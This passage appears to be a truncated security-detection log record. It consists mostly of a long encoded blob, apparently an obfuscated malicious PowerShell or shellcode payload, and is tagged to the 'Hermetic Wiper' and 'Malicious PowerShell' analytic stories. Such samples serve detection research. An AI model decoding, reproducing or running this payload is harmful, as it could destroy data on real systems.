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", UserID="'S-1-5-18'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": 